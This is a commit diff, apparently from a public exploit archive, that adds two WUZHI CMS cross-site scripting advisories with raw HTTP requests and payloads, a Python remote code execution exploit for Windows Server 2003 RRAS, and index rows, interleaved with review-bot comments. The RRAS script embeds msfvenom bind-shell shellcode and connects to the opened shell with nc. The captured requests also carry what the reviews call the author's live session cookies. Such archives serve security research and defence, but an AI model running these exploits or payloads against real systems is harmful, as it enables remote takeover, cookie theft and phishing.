DB: 2018-05-14
3 changes to exploits/shellcodes
Microsoft Windows 2003 SP2 - 'RRAS' SMB Remote Code Execution
WUZHI CMS 4.1.0 - 'form[qq_10]' Cross-Site Scripting
WUZHI CMS 4.1.0 - 'tag[pinyin]' Cross-Site Scripting
parent 7788a305c5
commit 0ca4688023
4 changed files with 134 additions and 0 deletions
16
exploits/php/webapps/44617.txt
Normal file
@ -0,0 +1,16 @@
# Exploit Title: WUZHI CMS 4.1.0 XSS Vulnerability
# Date: 2018-4-23
# Exploit Author: jiguang (s1@jiguang.in)
# Vendor Homepage: https://github.com/wuzhicms/wuzhicms
# Software Link: https://github.com/wuzhicms/wuzhicms
# Version: 4.1.0
# CVE: CVE-2018-10313

An issue was discovered in WUZHI CMS 4.1.0 (https://github.com/wuzhicms/wuzhicms/issues/133)
There is a xss vulnerability that can stealing administrator cookie, fishing attack, etc. via the form%5Bqq_10%5D parameter post to the /index.php?m=member&f=index&v=profile&set_iframe=1

`POST /wuzhi/www/index.php?m=member&f=index&v=profile&set_iframe=1 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Referer: http://localhost/wuzhi/www/index.php?m=member&f=index&v=profile&set_iframe=1 Content-Type: application/x-www-form-urlencoded Content-Length: 74 Cookie: PHPSESSID=uk4g8bm4l96iv5rl6ej2re83a3; EkT_siteid=Wl70z0XOgxO6TVPS70twsg%3D%3D; EkT_qkey=jiPLTZIrWUySV8FmwZwibPjlIPfq0nTj; EkT_userkeys=e7%2FCIDS8IFYxTUG8kAb7Ww%3D%3D; EkT_truename=yuduo; EkT_auth=lwMUjMOtAXpsQyZViV3zkNdoXMK7Up5NWRRI4Ro4FDKECQHhZ1ntK0WcBotqHVYyx3z9AYABYpAsEx4OdqcExF5S1d7Gw31AvtN07WdqMw28yLCoyNv8RA%3D%3D; EkT__uid=ocqUyYLd7bm05%2Ft4KcS%2B6Q%3D%3D; EkT__username=URDJ1YisL%2BXkt7Mzgg3aNA%3D%3D; EkT__groupid=aZR0cJTYiMBkLfoq8PwJ0g%3D%3D; EkT_modelid=10; tFf_uid=ej6BNn7ulZVYfrHwlgXMvg%3D%3D; tFf_username=YuhCykTKqrPt5fHl2zROVg%3D%3D; tFf_wz_name=IAFonn80xi%2FUvXNXx8uR%2FQ%3D%3D; tFf_siteid=dUi1cO%2FrqMr0atgyt9b%2BNw%3D%3D; tFf_auth=EVUCupGrAYuOzHKFNYqbS%2B39rd2Ynyn74kyNU3KlUwiQCJGQMAgEMU0go7SqkJsUA8kNZq6BsF5nFNbEeL5ehNOQ5DkCGZ4h4JnRqFB8UFIh9kWHsJe84Q%3D%3D; tFf__uid=FM0wd0X5ONWZsKHK8N3j%2Fw%3D%3D; tFf__username=haycqodNzDQbfpqnsWY3xA%3D%3D; tFf__groupid=I7EFExZnf2tvQCMhDV%2B1nA%3D%3D; tFf_truename=yuduo; tFf_modelid=10; SwW_uid=Bk1YojgAB4vSAv%2BmPy3WYg%3D%3D; SwW_username=BTEh6yj6GaEMdyByi0JOZw%3D%3D; SwW_wz_name=8vypKiZ6Ck1JQloRN3gGZQ%3D%3D; SwW_siteid=jm2uH%2FJAmU8uh1X4AlQ1nQ%3D%3D; SwW_qkey=sSAglhFB%2F04GAI1A3H4vDpnfBjktIjQO; SwW_truename=yuyuyu; SwW_auth=qVG8d0BqbIYaHf7emEsG%2Bz%2Fo4LTxYomIRzLjUyu1wWd0BfW4Eucw1UXVm3OTEBexHDGzzwvYarSW62r%2F%2BZrP6RZloFSgyn1%2B5QSsfVv8XDbbIN5Wzd32rQ%3D%3D; SwW__uid=SQgSrskOQqPeThE7vxpQuQ%3D%3D; SwW__username=ZnY2K%2B8IB6WgdsrHTD%2F%2Fzg%3D%3D; SwW__groupid=wVnor3QYe03CC%2B9JInwPIQ%3D%3D; SwW_modelid=10 
Connection: close Upgrade-Insecure-Requests: 1

`form%5Bqq_10%5D`=234234" onmouseover="confirm(22)&submit=%E6%8F%90%E4%BA%A4`

------------------
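Review bot: the captured request in this hunk still carries the author's live session material on the Cookie: line (PHPSESSID plus the EkT_, tFf_ and SwW_ auth, uid, username and qkey values); none of it is needed to demonstrate the reflected parameter and it should be replaced with placeholders before the advisory is published. Two smaller points in the same hunk: the backticks wrapping the request and the 'form%5Bqq_10%5D' name are markdown residue in a plain-text file and should be dropped, and "fishing attack" in the description should read "phishing attack".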
28
exploits/php/webapps/44618.txt
Normal file
@ -0,0 +1,28 @@
# Exploit Title: WUZHI CMS 4.1.0 XSS Vulnerability
# Date: 2018-4-23
# Exploit Author: jiguang (s1@jiguang.in)
# Vendor Homepage: https://github.com/wuzhicms/wuzhicms
# Software Link: https://github.com/wuzhicms/wuzhicms
# Version: 4.1.0
# CVE: CVE-2018-10311

An issue was discovered in WUZHI CMS 4.1.0 (https://github.com/wuzhicms/wuzhicms/issues/131)
There is a xss vulnerability that can stealing administrator cookie, fishing attack, etc. via the tag[pinyin] parameter post to the /index.php?m=tags&f=index&v=add&&_su=wuzhicms&_menuid=?&_submenuid=?


`[POST /www/index.php?m=tags&f=index&v=add&&_su=wuzhicms&_menuid=95&_submenuid=101 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://localhost/www/index.php?m=tags&f=index&v=add&&_su=wuzhicms&_menuid=95&_submenuid=101
Content-Type: application/x-www-form-urlencoded
Content-Length: 270
Cookie: PHPSESSID=uk4g8bm4l96iv5rl6ej2re83a3; EkT_uid=c%2FzWH2EByNj%2Fm78WencnAg%3D%3D; EkT_username=oR5iColhZ3j6z343ib%2B9Lg%3D%3D; EkT_wz_name=LVeemy520l5DQnc4SQGtsw%3D%3D; EkT_siteid=Wl70z0XOgxO6TVPS70twsg%3D%3D; EkT_qkey=jiPLTZIrWUySV8FmwZwibPjlIPfq0nTj
Connection: close
Upgrade-Insecure-Requests: 1

tag%5Btag%5D=jiguang&tag%5Btitle%5D=jiguang&tag%5Bkeyword%5D=jiguang&tag%5Bdesc%5D=jiguang&tag%5Bisshow%5D=1&tag%5Blinkageid%5D=0&LK2_1=0&## tag%5Bpinyin%5D=ji%3Cimg%2Fsrc%3D1+onerror%3Dalert%28document.cookie%29%3E&tag%5Bletter%5D=&tag%5Burl%5D=&submit=%E6%8F%90+%E4%BA%A4](url)`

------------------
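Review bot: the POST body on the last data line of this hunk contains a stray "## " in front of tag%5Bpinyin%5D that is not part of the request: the declared Content-Length: 270 matches the body exactly once those three characters are removed, so the marker should go or be moved into a comment above the request. The Accept header has also lost its */* entry (it now reads ';q=0.9,/;q=0.8', whereas the sibling 44617.txt keeps '*/*;q=0.8') and the whole request is wrapped in '[ ... ](url)' markdown-link residue, both signs that the text went through a markdown renderer before being saved as .txt. Finally, the description gives _menuid=?&_submenuid=? while the request uses 95 and 101; a sentence noting that the menu ids are installation-specific would reconcile the two.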
87
exploits/windows/remote/44616.py
Executable file
@ -0,0 +1,87 @@
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#Tested in Windows Server 2003 SP2 (ES) - Only works when RRAS service is enabled.

#The exploited vulnerability is an arbitraty pointer deference affecting the dwVarID field of the MIB_OPAQUE_QUERY structure.
#dwVarID (sent by the client) is used as a pointer to an array of functions. The application doest not check if the pointer is #pointing out of the bounds of the array so is possible to jump to specific portions of memory achieving remote code execution.
#Microsoft has not released a patch for Windows Server 2003 so consider to disable the RRAS service if you are still using
#Windows Server 2003.

#Exploit created by: Víctor Portal
#For learning purpose only

import struct
import sys
import time
import os

from threading import Thread

from impacket import smb
from impacket import uuid
from impacket import dcerpc
from impacket.dcerpc.v5 import transport

target = sys.argv[1]

print '[-]Initiating connection'
trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % target)
trans.connect()

print '[-]connected to ncacn_np:%s[\\pipe\\browser]' % target
dce = trans.DCERPC_class(trans)

#RRAS DCE-RPC endpoint
dce.bind(uuid.uuidtup_to_bin(('8f09f000-b7ed-11ce-bbd2-00001a181cad', '0.0')))

#msfvenom -a x86 --platform windows -p windows/shell_bind_tcp lport=4444 -b "\x00" -f python
buf = ""
buf += "\xb8\x3c\xb1\x1e\x1d\xd9\xc8\xd9\x74\x24\xf4\x5a\x33"
buf += "\xc9\xb1\x53\x83\xc2\x04\x31\x42\x0e\x03\x7e\xbf\xfc"
buf += "\xe8\x82\x57\x82\x13\x7a\xa8\xe3\x9a\x9f\x99\x23\xf8"
buf += "\xd4\x8a\x93\x8a\xb8\x26\x5f\xde\x28\xbc\x2d\xf7\x5f"
buf += "\x75\x9b\x21\x6e\x86\xb0\x12\xf1\x04\xcb\x46\xd1\x35"
buf += "\x04\x9b\x10\x71\x79\x56\x40\x2a\xf5\xc5\x74\x5f\x43"
buf += "\xd6\xff\x13\x45\x5e\x1c\xe3\x64\x4f\xb3\x7f\x3f\x4f"
buf += "\x32\x53\x4b\xc6\x2c\xb0\x76\x90\xc7\x02\x0c\x23\x01"
buf += "\x5b\xed\x88\x6c\x53\x1c\xd0\xa9\x54\xff\xa7\xc3\xa6"
buf += "\x82\xbf\x10\xd4\x58\x35\x82\x7e\x2a\xed\x6e\x7e\xff"
buf += "\x68\xe5\x8c\xb4\xff\xa1\x90\x4b\xd3\xda\xad\xc0\xd2"
buf += "\x0c\x24\x92\xf0\x88\x6c\x40\x98\x89\xc8\x27\xa5\xc9"
buf += "\xb2\x98\x03\x82\x5f\xcc\x39\xc9\x37\x21\x70\xf1\xc7"
buf += "\x2d\x03\x82\xf5\xf2\xbf\x0c\xb6\x7b\x66\xcb\xb9\x51"
buf += "\xde\x43\x44\x5a\x1f\x4a\x83\x0e\x4f\xe4\x22\x2f\x04"
buf += "\xf4\xcb\xfa\xb1\xfc\x6a\x55\xa4\x01\xcc\x05\x68\xa9"
buf += "\xa5\x4f\x67\x96\xd6\x6f\xad\xbf\x7f\x92\x4e\xae\x23"
buf += "\x1b\xa8\xba\xcb\x4d\x62\x52\x2e\xaa\xbb\xc5\x51\x98"
buf += "\x93\x61\x19\xca\x24\x8e\x9a\xd8\x02\x18\x11\x0f\x97"
buf += "\x39\x26\x1a\xbf\x2e\xb1\xd0\x2e\x1d\x23\xe4\x7a\xf5"
buf += "\xc0\x77\xe1\x05\x8e\x6b\xbe\x52\xc7\x5a\xb7\x36\xf5"
buf += "\xc5\x61\x24\x04\x93\x4a\xec\xd3\x60\x54\xed\x96\xdd"
buf += "\x72\xfd\x6e\xdd\x3e\xa9\x3e\x88\xe8\x07\xf9\x62\x5b"
buf += "\xf1\x53\xd8\x35\x95\x22\x12\x86\xe3\x2a\x7f\x70\x0b"
buf += "\x9a\xd6\xc5\x34\x13\xbf\xc1\x4d\x49\x5f\x2d\x84\xc9"
buf += "\x6f\x64\x84\x78\xf8\x21\x5d\x39\x65\xd2\x88\x7e\x90"
buf += "\x51\x38\xff\x67\x49\x49\xfa\x2c\xcd\xa2\x76\x3c\xb8"
buf += "\xc4\x25\x3d\xe9"

#NDR format
stub = "\x21\x00\x00\x00" #dwPid = PID_IP (IPv4)
stub += "\x10\x27\x00\x00" #dwRoutingPID
stub += "\xa4\x86\x01\x00" #dwMibInEntrySize
stub += "\x41"*4 #_MIB_OPAQUE_QUERY pointer
stub += "\x04\x00\x00\x00" #dwVarID (_MIB_OPAQUE_QUERY)
stub += "\x41"*4 #rgdwVarIndex (_MIB_OPAQUE_QUERY)
stub += "\xa4\x86\x01\x00" #dwMibOutEntrySize
stub += "\xad\x0b\x2d\x06" #dwVarID ECX (CALL off_64389048[ECX*4]) -> p2p JMP EAX #dwVarID (_MIB_OPAQUE_QUERY)
stub += "\xd0\xba\x61\x41\x41" + "\x90"*5 + buf + "\x41"*(100000-10-len(buf)) #rgdwVarIndex (_MIB_OPAQUE_QUERY)
stub += "\x04\x00\x00\x00" #dwId (_MIB_OPAQUE_INFO)
stub += "\x41"*4 #ullAlign (_MIB_OPAQUE_INFO)


dce.call(0x1e, stub) #0x1d MIBEntryGetFirst (other RPC calls are also affected)
print "[-]Exploit sent to target successfully..."

print "Waiting for shell..."
time.sleep(5)
os.system("nc " + target + " 4444")
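Review bot: the comment on the dce.call(0x1e, stub) line names opnum 0x1d (MIBEntryGetFirst) while the call passes 0x1e; the two should agree so the record of which RRAS method the file exercises is unambiguous. Smaller points in the same hunk: struct, Thread, smb and dcerpc are imported but never used; sys.argv[1] is read with no argument check, so running the script without a target dies with an IndexError instead of a usage message; the target string is spliced into os.system("nc " + target + " 4444"), so anything that is not a bare address is interpreted by the shell (subprocess.call(['nc', target, '4444']) avoids that); the print statements are Python 2 only, which the bare "#!/usr/bin/env python" shebang does not make explicit; and "arbitraty pointer deference" and "doest not" in the header comments should read "arbitrary pointer dereference" and "does not".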
@ -16485,6 +16485,7 @@ id,file,description,date,author,type,platform,port
44598,exploits/php/remote/44598.rb,"PlaySMS - 'import.php' Authenticated CSV File Upload Code Execution (Metasploit)",2018-05-08,Metasploit,remote,php,
44599,exploits/php/remote/44599.rb,"PlaySMS 1.4 - 'sendfromfile.php?Filename' Authenticated 'Code Execution (Metasploit)",2018-05-08,Metasploit,remote,php,
44611,exploits/php/remote/44611.rb,"Mantis 1.1.3 - 'manage_proj_page' PHP Code Execution (Metasploit)",2018-05-10,Metasploit,remote,php,80
44616,exploits/windows/remote/44616.py,"Microsoft Windows 2003 SP2 - 'RRAS' SMB Remote Code Execution",2018-05-13,vportal,remote,windows,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
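Review bot: the new 44616 row leaves the port column empty even though the script reaches RRAS over an SMB named pipe (ncacn_np) and the description itself says 'SMB', while neighbouring rows that target a network service fill the column in (44611 carries 80); adding 445 would keep the index consistent with the exploit. The description's 'Microsoft Windows 2003 SP2' also differs from the file's own header, which names 'Windows Server 2003 SP2'; one spelling should be used in both places.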
@ -39302,3 +39303,5 @@ id,file,description,date,author,type,platform,port
44607,exploits/java/webapps/44607.txt,"ModbusPal 1.6b - XML External Entity Injection",2018-05-10,"Trent Gordon",webapps,java,
44608,exploits/php/webapps/44608.txt,"MyBB Latest Posts on Profile Plugin 1.1 - Cross-Site Scripting",2018-05-10,0xB9,webapps,php,
44613,exploits/windows/webapps/44613.txt,"Open-AudIT Community - 2.2.0 – Cross-Site Scripting",2018-05-11,"Tejesh Kolisetty",webapps,windows,
44617,exploits/php/webapps/44617.txt,"WUZHI CMS 4.1.0 - 'form[qq_10]' Cross-Site Scripting",2018-05-13,jiguang,webapps,php,
44618,exploits/php/webapps/44618.txt,"WUZHI CMS 4.1.0 - 'tag[pinyin]' Cross-Site Scripting",2018-05-13,jiguang,webapps,php,
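Review bot: the two new rows name the affected parameters ('form[qq_10]' and 'tag[pinyin]') and carry the CVE-distinct titles, but the "# Exploit Title" line in both 44617.txt and 44618.txt reads only "WUZHI CMS 4.1.0 XSS Vulnerability"; the file headers should carry the same specific titles so the index and the advisories agree. The rows are dated 2018-05-13 while both files give "# Date: 2018-4-23"; if the column is the publication date that is expected, but the files should at least use the zero-padded form the index uses.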